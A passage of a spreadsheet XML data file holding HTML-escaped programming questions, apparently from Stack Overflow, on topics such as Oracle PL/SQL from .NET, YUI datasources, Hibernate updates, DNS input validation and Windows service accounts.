  (read-line))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;It is obviously just the version I'm using. It's the version included in the current sample code of Programming Clojure, I'll test out the current release version and see if that is the problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you draw like a Crayon?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.crayonphysics.com/"&gt;Crayon Physics Deluxe&lt;/a&gt; is a commercial game that came out recently.  Watch the video on the main link to get an idea of what I'm talking about.&lt;/p&gt;
&lt;p&gt;It allows you to draw shapes and have them react with proper physics.  The goal is to move a ball to a star across the screen using contraptions and shapes you build.&lt;/p&gt;
&lt;p&gt;While the game is basically a wrapper for the popular &lt;a href="http://www.box2d.org/"&gt;Box2D Physics Engine&lt;/a&gt;, it does have one feature that I'm curious about how it is implemented.&lt;/p&gt;
&lt;p&gt;Its drawing looks &lt;em&gt;very&lt;/em&gt; much like a Crayon.  You can see the texture of the crayon and as it draws it varies in thickness and darkness just like an actual crayon drawing would look like.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.kloonigames.com/crayon/screenshots/crayon_small_01.jpg" alt="alt text"&gt; &lt;img src="http://www.kloonigames.com/crayon/screenshots/crayon_small_02.jpg" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;The background texture is freely available &lt;a href="http://flickr.com/photos/felipeskroski/325477721/"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img267.imageshack.us/img267/1488/crayonmh7.png" alt="alt text"&gt;&lt;br&gt;
&lt;em&gt;Close up of crayon drawing - Note the varying darkness&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;What kind of algorithm would be used to render those lines in a way that looks like a Crayon? Is it a simple texture applied with a random thickness and darkness or is there something more going on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Password Recovery link on a LogIn control requires a user to login</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to test this out on my site but it doesn't quite work because I have to be logged in to go to this page.&lt;/p&gt;
&lt;p&gt;Is there a configuration setting that I haven't set or set incorrectly? &lt;/p&gt;
&lt;p&gt;EDIT:  rm's answer led me to this &lt;a href="http://msdn.microsoft.com/en-us/library/ms178335.aspx" rel="nofollow"&gt;link from Microsoft&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I change the description of input's displayed for an operation defined using a MXBean</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a MXBean to instrument a certain feature, and I have a method that takes in 3 input arguments.&lt;/p&gt;
&lt;p&gt;By default, on the jconsole, the arguments are displayed as p1, p2, p3 etc. I have @params describing each parameter. How do I make jConsole use those?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Sample implements SampleMXBean {
    /**
     * method 1
     *
     * @param input1 Input One
     * @param input2 Input Two
     */
     public void getInput(int input1, int input2) {
       ...
       ...
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have registered the above MXBean , and when I launch, the panel for this operation, I get a button with "getInput" as the text, and 2 text boxes with names as p1 and p2, instead of "Input One" and "Input Two".&lt;/p&gt;
&lt;p&gt;Are there any annotations that I need to use to achieve this?
(Btw I'm using jdk1.6)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use a CSV file like a (MSsql or mysql or BDE database) in C++ Builder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I apologise in advance if this question isn't very specific.&lt;/p&gt;
&lt;p&gt;Would it be possible to do the following.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;when the application loads&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;read the contents of a CSV file into a dataset. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;while the application is running&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;operate on that dataset exactly as if it were a mysql or mssql or bde database (run queries.  insert records.  delete records.  alter records.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;when the application closes&lt;/strong&gt; - write the dataset back to the csv file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi-line PL/SQL command with .NET OracleCommand</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using System.Data.OracleClient.OracleCommand to create a table and fill it out with some data. The query I am using runs OK in PS/SQL Developer, however when I'm trying to execute it from within .NET application I'm getting this error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ORA-06550: line 1, column 20:
PLS-00103: Encountered the symbol "" when expecting one of the following:
   begin function package pragma procedure subtype type use
   &amp;lt;an identifier&amp;gt; &amp;lt;a double-quoted delimited-identifier&amp;gt; form
   current cursor
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Column 20 is exactly where first line ends. As soon as I remove line end characters (\r\n) from the command it all starts working.&lt;/p&gt;
&lt;p&gt;I wonder is there some hidden configuration parameter to enable multi-line queries for Oracle? &lt;/p&gt;
&lt;p&gt;Here is some code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;               var text = @"declare cnt number;
begin
 select count(*) into cnt from all_tables
 where table_name = 'TABLE_A';
if cnt = 1 then
   begin 
      execute immediate 'truncate table TABLE_A';
      execute immediate 'drop table TABLE_A';
   end;
end if;
execute immediate 'create table TABLE_A as 
 (SELECT DISTINCT v.ID, g.ext_id FROM VIEW_A v
 JOIN TABLE_B B ON v.id = B.Id
 WHERE YEAR1 = ''2008'')';
end;");
            var createTempTable = new OracleCommand(text, conn);
            createTempTable.CommandType = CommandType.Text;
            conn.Open();
            try
            {
                createTempTable.ExecuteNonQuery();
            }
            catch(Exception ex)
            {
                throw;
            }
            finally
            {
                conn.Close();    
            }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for your help&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help me understand this UI jargon</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From an &lt;a href="http://www.flashmagazine.com/community/detail/balsamiq_mockups_-_a_solid_case_for_air/" rel="nofollow"&gt;interview&lt;/a&gt; with &lt;a href="http://www.peldi.com/blog/" rel="nofollow"&gt;Peldi Guilizzoni&lt;/a&gt;, the creator of &lt;a href="http://www.balsamiq.com/" rel="nofollow"&gt;Balsamiq&lt;/a&gt;--an Adobe AIR application for creating mockups:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;And then you started working on the
  first version Balsamiq Mockups. Was
  there any hurdles in the development
  process?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Ha! There's always hurdles, it's part
  of the fun of coding isn't it?&lt;/p&gt;
  &lt;p&gt;Let me think. I think I rewrote the
  foundation classes (the Model, the
  Input Manager, the base UI Component,
  etc) a few times until I was happy
  with them. First I started with each
  UI control handle the mouse events for
  moving and resizing itself, then moved
  all the mouse handling to a
  transparent InputManager canvas that
  sits on top of the view (similar to
  what I had done for Connect's
  whiteboard). I also had to learn and
  digest all the different options for
  run-time skinning before I was able to
  create a strategy that worked for my
  tool, which took a while.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Is foundation classes a common term for the core classes in a framework?&lt;/li&gt;
&lt;li&gt;Are "Model, UI Component, Input Manager" common themes in user interface development and what do they comprise of exactly?&lt;/li&gt;
&lt;li&gt;What does he mean when he says he "moved the mouse handling to a transparent InputManager canvas on top of the view"? What is the view and the InputManager canvas.&lt;/li&gt;
&lt;li&gt;Why does he do runtime skinning? Can't the skinning be done before hand? What other options are available that he could have explored?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am trying to get a handle on his design architecture.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to parse NULL value returned using YUI datasource</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using YUI datatable and datasource to render data in one of my projects. The data returned happens to be NULL and YUI datasource is unable to parse it.&lt;/p&gt;
&lt;p&gt;Below is the declaration code of datasource and datatable. For readability sake, I am seperating each of the declarations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Column Descriptions declaration&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            var columnDescription = 
		    [
				{key:'Requirements'},
				{key:'abc'},
				{key:'xyz'}
		     ];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This columnDescription is set in the function below.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DataSource Declaration&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var dataSrcSample = new YAHOO.util.FunctionDataSource(getDataGrid);
    			myDataSource.connMethodPost = true;
    			myDataSource.responseType = YAHOO.util.DataSource.TYPE_JSON;
            	myDataSource.responseSchema = {
               	 fields:['Requirements', 
{key:'abc',parser:YAHOO.util.DataSource.parseString},
 {key:'xyz',parser:YAHOO.util.DataSource.parseString}]
                	};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;getDataGrid&lt;/strong&gt; function makes the call to server side to get the data from the server.
Below is the table definition itself.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;		YAHOO.example.sampleTable = function()
		{
                           var columnDesc=columnDescription;
			var myDataSource = dataSrcSample;
			var oConfigs = 
			{
				width:'100%'
			};
			var myDataTable = new YAHOO.widget.DataTable("tableContainerDiv", 
columnDesc,
 myDataSource,
 oConfigs);
    		}();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;tableContainerDiv&lt;/strong&gt; is declared in the html page. This is the container div.
The function that gets the JSON data from server.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function getDataGrid()
{
      //calls backend and gets the data
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The function is returning json string that has some null values.  Datasource constructor is complaining following problems.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ERROR_DATAINVALID&lt;/li&gt;
&lt;li&gt;ERROR_DATANULL&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I checked the yui &lt;a href="http://developer.yahoo.com/yui/docs/YAHOO.util.DataSourceBase.html#method_DataSourceBase.parseString" rel="nofollow"&gt;documentation&lt;/a&gt; and found that the string parser does not parse null values. I am wondering if there is any way to parse this data. Do I have to handleResponse parse the raw data? Any suggestions appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AJAX command-line interface in browser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a Web app to allow users to view and manipulate data, particularly numeric and geographic data. It's important that the output be clear and professional (data grids, Google Map overlays, etc.). But in terms of the user interface, I'd rather start with the flexibility of a command-line interface before building GUI-style forms.&lt;/p&gt;
&lt;p&gt;Can you offer any tips, tricks, or suggestions to create an AJAX-based command-line interface that can drive the rest of the interface? Pointers to existing applications would be great, too.&lt;/p&gt;
&lt;p&gt;The stack I'm using is Django/Python on the server side and ExtJS in the browser. If possible, I'd like to route commands to the Django shell and then just add some extra functions to output the results to a data grid, a map, etc.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;@Soviut&lt;/strong&gt; Thanks for the quick response. I'm afraid I must not be making myself that clear. I want to use a shell to fire off commands on the server side that'll then feed back to output on the client side.&lt;/p&gt;
&lt;p&gt;Here's an example I just found: &lt;a href="http://shell.appspot.com/" rel="nofollow"&gt;http://shell.appspot.com/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;It's just that I'd like to have that not just produce text output inside the shell but also produce output that will be picked up by other AJAX listeners for data grids and maps.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are valid characters for a DNS Zone file and how can I sanitize user input?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an interface to allow our clients to update their DNS on their own.&lt;/p&gt;
&lt;p&gt;I have 2 questions: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What constitutes valid a valid host and target records? (A, CNAME, MX, TXT) i.e. if the user enters ........ for the host and target the DNS server won't like that.&lt;/li&gt;
&lt;li&gt;Is there a regex I can use to sanitize user input?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;BTW it is BIND9 DNS and C# web app.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Kyle&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What data provider for a tclientdataset using a csv file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a tclientdataset.  It is used to get data to and from a csv file.  The csv file may not exist until the application is run.  I have the following code in a tbutton...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ClientDataSet1-&amp;gt;FileName = "c:\\testdata.csv";
ClientDataSet1-&amp;gt;Open();
 AddFiles(Edit1-&amp;gt;Text);
 ClientDataSet1-&amp;gt;SaveToFile("c:\\testdata.csv");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run the application I get a "Missing data providor or data packet" error.  I set the data provider to "Microsoft Text Driver (*.txt; *.csv)" and I still get the error.&lt;/p&gt;
&lt;p&gt;What am I missing out or doing wrong?   I REALLY don't want to have to create a dsn or do any manual pre-run work.  I want the application to do all that.  so I can move it to another computer and it just works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you list the matches of Vim's search?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to list the matches, when I hit:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/example
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so that I see where all matches are at once.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python quotient vs remainder</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The python 2.6 docs state that &lt;code&gt;x % y&lt;/code&gt; is defined as the remainder of x / y (&lt;a href="http://docs.python.org/library/stdtypes.html#numeric-types-int-float-long-complex" rel="nofollow"&gt;http://docs.python.org/library/stdtypes.html#numeric-types-int-float-long-complex&lt;/a&gt;). I am not clear on what is really occurring though, as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for i in range(2, 11):
    print 1.0 % i
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;prints "1.0" ten times, rather than "0.5, 0.333333, 0.25" etc. as I expected (1/2 = 0.5, etc). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>CGContext - is there a way to reset the current context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my iPhone project, I've got a UIView where I implement the drawRect method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (void)drawRect:(CGRect)rect {
    CGContextRef context = UIGraphicsGetCurrentContext();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Inside the method I do a whole bunch of drawing of lines, images and texts using this context. The problem is that when I re-use this view, the context does not get reset. Is there a method I can call to reset the context somehow?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Better Performance on Associations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now I have a table called Campaigns that has many Hits, if I call say:&lt;/p&gt;
&lt;pre&gt;Campaign.find(30).hits&lt;/pre&gt;
Which takes 4 seconds, or 4213 ms.
&lt;br /&gt;&lt;br /&gt;
If I call this instead:
&lt;pre&gt;
campaign = Campaign.find(30)
campaign.hits.count
&lt;/pre&gt;
&lt;p&gt;Does it still load all of the hits, then count? Or does it see I am counting and avoids loading all of the hits? (Which is currently 300,000+ rows).&lt;br /&gt;&lt;br /&gt;
I am trying to figure out a smart way to load/count my hits. I am thinking about adding a method to my Campaign.rb model, like:&lt;/p&gt;
&lt;pre&gt;
def self.total_hits
   find :first, :select =&gt; 'COUNT(id) as hits', :conditions =&gt; ["campaign_id = ?", self.id]
end
&lt;/pre&gt;
&lt;p&gt;I know that query won't load from the &lt;code&gt;hits&lt;/code&gt; table, but that is just an example of counting it from a self made query, apposed to Ruby on Rails doing this for me.
&lt;br /&gt;&lt;br /&gt;
Would this memcache query be more effecient? (I have it running, but doesn't seem to be any better/faster/slower, just the same speed.)&lt;/p&gt;
&lt;pre&gt;
def self.hits
    Rails.cache.fetch("Campaign_Hits_#{self.campaign_id}", :expires_in =&gt; 40) {
      find(:first, :select =&gt; 'COUNT(id) as hits', :conditions =&gt; ["campaign_id = ?", self.campaign_id]).hits
    }
end
&lt;/pre&gt;
&lt;p&gt;Any suggestions would be great!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing IO.Stream interaction</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method in my business logic layer that accepts a stream, which in the GUI comes from a user uploading a file, and I am interested in which is an appropriate way to test that the method appropriately uses this stream to make decisions.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Sub Initialize(ByVal uploadStream As Stream)
    ''// Logic using uploadStream
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For testing purposes I wish to DI a mocked stream into this method, but I find a stiffling lack of abstraction whenever working with streams.&lt;/p&gt;
&lt;p&gt;Intuition tells me that a need to create a Stream wrapper which would allow me to DI an interface of the wrapper to test interaction of my logic with the stream wapper.&lt;/p&gt;
&lt;p&gt;What's the best way to proceed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Optimize Hibernate entities saving?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi
Is there a way to reduce unnecessary/empty fields in SQL inserts and SQL updates?&lt;/p&gt;
&lt;p&gt;For example, I have a single hibernate entity class mapped to a table that has 10 columns. The populating of data is actually done in two phases. When the user submit a request, I will insert the request information into the table with the hibernate entity, but populating only 7 fields. After some processing (wait for other users interaction for example), I will populate the remaining 3 fields (with the id given from the previous insert).&lt;/p&gt;
&lt;p&gt;If I stick with a single entity class, for the second update, the steps I do is as follows:&lt;/p&gt;
&lt;p&gt;1) Load the entity identified by id&lt;/p&gt;
&lt;p&gt;2) Save the entity, which generates sql that seems to be sending all the fields over.&lt;/p&gt;
&lt;p&gt;Alternatively, I created two entity class, and point to the same table and save them seperately.&lt;/p&gt;
&lt;p&gt;Does anyone have a better suggestion?&lt;/p&gt;
&lt;p&gt;Kent&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;What I really like to achieve is something to the following effect:
insert t(id,field1,field2) (?,?,?)
update t set field3=? field4=? where id=?&lt;/p&gt;
&lt;p&gt;The best I could achieve now with dynamicUpdate=true is
insert t(id,field1,field2) (?,?,?)
select field1,field2,field3,field4 from t where id=?
update t set field3=? field4=? where id=?&lt;/p&gt;
&lt;p&gt;Is there a way to eliminate that select statement? The original persisted object is not stored anywhere in memory after the insert.&lt;/p&gt;
&lt;p&gt;An additional note. The entity class is annotated with Hibernate validation. I am currently trying out to achieve the above desired effect, so I commented them out. But when I turn them back on, I get validation errors due to @NotNull and @NotEmpty.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which API to use to draw 3D objects in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to do some 3D programming in C# but I'm not sure where to start looking for an API.  If I were doing this in C++ I know the options are OpenGL and DirectX, but I'm not sure what the options are for C#.  I don't necessarily want to program a whole game, just manipulate a few objects.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Exchanging of screens between two users</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a web-based application with tech stack -
1. Java Struts based
2. Hibernate
3. DB - Oracle
4. App server - JBoss server&lt;/p&gt;
&lt;p&gt;We are facing an issue related to concurrent usage of the application by two or more users. When I am doing an operation and I submit the changes, the next page or success message that comes up is of a different operation that another user is performing at the same time.&lt;/p&gt;
&lt;p&gt;Users are logged in as different users and so are using different sessions. &lt;/p&gt;
&lt;p&gt;We have no clue of where the problem is, so I am not sure what other details I can provide. &lt;/p&gt;
&lt;p&gt;Has anyone else faced such an issue or any pointers? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is so evil about a Flash based website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the feeling that &lt;a href="http://en.wikipedia.org/wiki/Adobe_Flash"&gt;Flash&lt;/a&gt;-based ( or &lt;a href="http://en.wikipedia.org/wiki/Microsoft_Silverlight"&gt;Silverlight&lt;/a&gt;-based) websites are generally frowned upon, except when you are creating games or multimedia-content rich applications. Why this is so?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stubbing property getter prior to method on the same object - Rhino.Mocks 3.5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a possible bug scenario for Rhino.Mocks 3.5 here: &lt;a href="http://groups.google.com/group/RhinoMocks/browse_thread/thread/b38d09b276e66ec7" rel="nofollow"&gt;http://groups.google.com/group/RhinoMocks/browse_thread/thread/b38d09b276e66ec7&lt;/a&gt;
Has anyone knows what's the issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dojo: inheritance with default value - the mixin doesn't happen</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish to declare a new dojo class inheriting from an existing dojo class, but with my own choice of default values for the class's properties.  (The user can still override those values.)&lt;/p&gt;
&lt;p&gt;I am declaring my own version of the &lt;code&gt;dijit.form.FilteringSelect&lt;/code&gt; such that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the &lt;code&gt;hasDownArrow&lt;/code&gt; property defaults to &lt;code&gt;false&lt;/code&gt; (rather than the standard &lt;code&gt;true&lt;/code&gt;) and&lt;/li&gt;
&lt;li&gt;there's an extra possible property &lt;code&gt;storeUrl&lt;/code&gt; which allows me to connect the &lt;code&gt;FilteringSelect&lt;/code&gt; to the corresponding &lt;code&gt;QueryReadStore&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here's what I did, without success:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dojo.provide("my.FilteringSelect");
dojo.require("dijit.form.FilteringSelect");
dojo.require("dojox.data.QueryReadStore");
dojo.declare(
   "my.FilteringSelect",
   [
      dijit.form.FilteringSelect,  /* base superclass */
      { hasDownArrow:false, storeUrl:"/" }  /* mixin */
   ],
   {
      constructor: function(params, srcNodeRef){
         console.debug("Constructing my.FilteringSelect with storeUrl "
                        + this.storeUrl);
         this.store = new dojox.data.QueryReadStore({url:this.storeUrl});
      }
   }
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Say, I try to generate declaratively in the HTML such a version of &lt;code&gt;my.FilteringSelect&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type="text" id="birthplace" name="birthplace"
       promptMessage="Start typing, and choose among the suggestions"
       storeUrl="/query/regions"
       dojoType="my.FilteringSelect" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will indeed create a &lt;code&gt;FilteringSelect&lt;/code&gt; with the desired &lt;code&gt;promptMessage&lt;/code&gt; (which means that the superclass is properly getting the params), but &lt;code&gt;hasDownArrow&lt;/code&gt; is &lt;code&gt;true&lt;/code&gt; (contrary to my default mixin) and the &lt;code&gt;store&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt; (and the Firebug console reports that &lt;code&gt;storeUrl&lt;/code&gt; is "&lt;code&gt;undefined&lt;/code&gt;").&lt;/p&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing crystal reports in an ASP.NET application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to access a Crystal Report that is deployed on a Crystal Report server.&lt;/p&gt;
&lt;p&gt;I want to display this report on my ASP.NET page. However, I don't want to include the report file in my project. I need to use the report file deployed on crystal report server.&lt;/p&gt;
&lt;p&gt;Can you please guide me on how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The difference between the 'Local System' account and the 'Network Service' account?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have written a Windows service that spawns a separate process. This process creates a COM object. If the service runs under the 'Local System' account everything works fine, but if the service runs under the 'Network Service' account, the external process starts up but it fails to create the COM object. The error returned from the COM object creation is not a standard COM error (I think it's specific to the COM object being created).&lt;/p&gt;
&lt;p&gt;So, how do I determine how the two accounts, 'Local System' and 'Network Service' differ? These built-in accounts seem very mysterious and nobody seems to know much about them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting the parent name of a URI/URL from absolute name C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given an absolute URI/URL, I want to get a URI/URL which doesn't contain the leaf portion. For example: given &lt;a href="http://foo.com/bar/baz.html"&gt;http://foo.com/bar/baz.html&lt;/a&gt;, I should get &lt;a href="http://foo.com/bar/"&gt;http://foo.com/bar/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The code which I could come up with seems a bit lengthy, so I'm wondering if there is a better way.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static string GetParentUriString(Uri uri)
    {            
        StringBuilder parentName = new StringBuilder();
        // Append the scheme: http, ftp etc.
        parentName.Append(uri.Scheme);            
        // Appned the '://' after the http, ftp etc.
        parentName.Append("://");
        // Append the host name www.foo.com
        parentName.Append(uri.Host);
        // Append each segment except the last one. The last one is the
        // leaf and we will ignore it.
        for (int i = 0; i &amp;lt; uri.Segments.Length - 1; i++)
        {
            parentName.Append(uri.Segments[i]);
        }
        return parentName.ToString();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One would use the function something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  static void Main(string[] args)
    {            
        Uri uri = new Uri("http://foo.com/bar/baz.html");
        // Should return http://foo.com/bar/
        string parentName = GetParentUriString(uri);                        
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks,
Rohit&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to handle incomplete files? Getting exception</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a java program which will create thread to search for a file in particular folder(source folder) and pick the file immediately for process work(convert it into csv file format) once it found the file in the source folder. Problem i am facing now is file which comes to source folder is big size(FTP tool is used to copy file from server to source folder), thread is picking that file immediately before it copies fully to source folder and throwing exception. How do i stop thread until the file copy into source folder completely?. It has to pick the file for processing only after the file is copied completely into source folder.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting table metadata in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find out how to get the following constraint information from a table in MySQL 5.0: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;primary key&lt;/li&gt;
&lt;li&gt;foreign keys and table references&lt;/li&gt;
&lt;li&gt;unique columns&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What is the syntax of the query or queries to do so? I have a feeling I'm close with &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/table-constraints-table.html"&gt;this&lt;/a&gt;, but there is no example.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I write to the parallel port from the Windows Command line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I write to parallel port through Windows XP command line?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Connection pooling in the MySQL .NET Connector</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a website in asp.net and mysql, I noticed that the performance of connection pooling in the mysql .net connector is horrible to say the least! For example sql server is 10x times faster in connection pooling (the sql server .net provider connecting to sql server), is there anything I could do to speed up connection pooling? Does the mysql .net connector make any checks when the connection is returned to the pool which cause the slowdown?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC - Manipulating HTTP Post</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When a form is posted back to the server, is it possible to manipulate, change, set the values contained in HTTP Post in the controller action? I would like to remove certain textbox values entered by the user so that these values always have to be re-entered (e.g. password fields). By default Html helpers extract initial values for HTML controls from the HTTP Post info.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java JTree expand only level one nodes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With a JTree, assuming the root node is level 0 and there may be up to 5 levels below the root, how can I easily expand all the level 1 nodes so that all level 1 &amp;amp; 2 branches and leafs are visible but levels 3 and below aren't?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Switching between two UITableViewControllers within a single UINavigationController</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a UINavigationController. In its toolbar is a segmented control with two buttons. Each button relates to its own UITableViewController.&lt;/p&gt;
&lt;p&gt;What I'm trying to achieve is someway of wiring up the navigation controller so that the views are switched depending on which button within the segmented control is active.&lt;/p&gt;
&lt;p&gt;I assume I should hold on to the table controllers, because I want to preserve the scrolling position within each view, e.g., if the user was positioned at the top of table 1, and the bottom of table 2, then this information should be preserved when switching.&lt;/p&gt;
&lt;p&gt;Any suggestions would be gratefully received!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Real-time Java interoperability</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering how it's the interoperability between JRE6 and the JVM from &lt;a href="http://www.rtsj.org" rel="nofollow"&gt;rtsj&lt;/a&gt;. It seems that I have to use only their implementation (since the code will be interpreted using their JVM), so I cannot use many of the features that Java 6 has to offer.
Can it support a GUI? (say for example to modify the parameters of an industrial process).&lt;/p&gt;
&lt;p&gt;I might be wrong, hoping to get some feedback from you.&lt;/p&gt;
&lt;p&gt;Also, it seems that are more real time implementations for Java. Which one did you use and which one did you like most?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WebSphere Portal 6.0 Portlet Error Logging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where I can find the error logs from a portlet deployed to WebSphere Portal 6.0 (Linux)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE7 Ext JS problem: Unspecified JS error on window.close()</t>
  </si>
  <si>
